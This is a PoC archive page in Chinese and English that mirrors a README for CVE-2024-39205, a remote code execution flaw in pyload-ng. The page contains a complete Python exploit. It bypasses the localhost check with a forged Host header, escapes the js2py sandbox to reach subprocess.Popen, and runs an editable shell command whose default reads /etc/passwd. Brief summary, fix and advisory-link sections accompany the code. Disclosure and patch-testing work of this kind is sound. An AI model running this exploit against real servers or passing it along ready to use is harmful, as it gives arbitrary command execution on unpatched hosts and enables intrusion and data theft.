POC详情: ab620f8d6608ab97c2e9b12a8c05a2eb3a3f4cfc

来源
https://github.com/Marven11/CVE-2024-39205-Pyload-RCE
关联漏洞
标题: pyLoad 安全漏洞 (CVE-2024-39205)
描述:pyLoad是pyLoad开源的一个用 Python 编写的免费开源下载管理器。 pyLoad 0.5.0b3.dev85及之前版本存在安全漏洞,该漏洞源于允许攻击者通过特制的HTTP请求执行任意代码。
描述
Pyload RCE with js2py sandbox escape
介绍
# CVE-2024-39205-Pyload-RCE
Pyload RCE with js2py sandbox escape 

## Summary
Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately.

## Fix
Upgrade to the newest version of pyload-ng or simply run pyload with python3.12 or above

## Details
js2py has a vulnerability of sandbox escape assigned as [CVE-2024-28397](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape), which is used by the `/flash/addcrypted2` API endpoint of pyload-ng. Although this endpoint is designed to only accept localhost connection, we can bypass this restriction using HTTP Header, thus accessing this API and achieve RCE.
 
## PoC
The PoC is provided as below, you can modify the shell command it execute:

```python
import socket
import base64
from urllib.parse import quote

host, port = input("host: "), int(input("port: "))

payload = """
// [+] command goes here:
let cmd = "head -n 1 /etc/passwd; calc; gnome-calculator;"
let hacked, bymarve, n11
let getattr, obj

hacked = Object.getOwnPropertyNames({})
bymarve = hacked.__getattribute__
n11 = bymarve("__getattribute__")
obj = n11("__class__").__base__
getattr = obj.__getattribute__

function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}

n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(n11)
function f() {
    return n11
}

"""

crypted_b64 = base64.b64encode(b"1234").decode()

data = f"package=pkg&crypted={quote(crypted_b64)}&jk={quote(payload)}"

request = f"""\
POST /flash/addcrypted2 HTTP/1.1
Host: 127.0.0.1:9666
Content-Type: application/x-www-form-urlencoded
Content-Length: {len(data)}

{data}
""".encode().replace(b"\n", b"\r\n")

def main():

    s = socket.socket()
    s.connect((host, port))

    s.send(request)
    response = s.recv(1024).decode()
    print(response)

if __name__ == "__main__":
    main()


```

## Impact
Anyone who runs the latest version (<=0.5.0b3.dev85) of  pyload-ng under python3.11 or below. pyload-ng don't use js2py for python3.12 or above.

## Links
https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g
文件快照

 [4.0K]  /data/pocs/ab620f8d6608ab97c2e9b12a8c05a2eb3a3f4cfc
└── [2.4K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。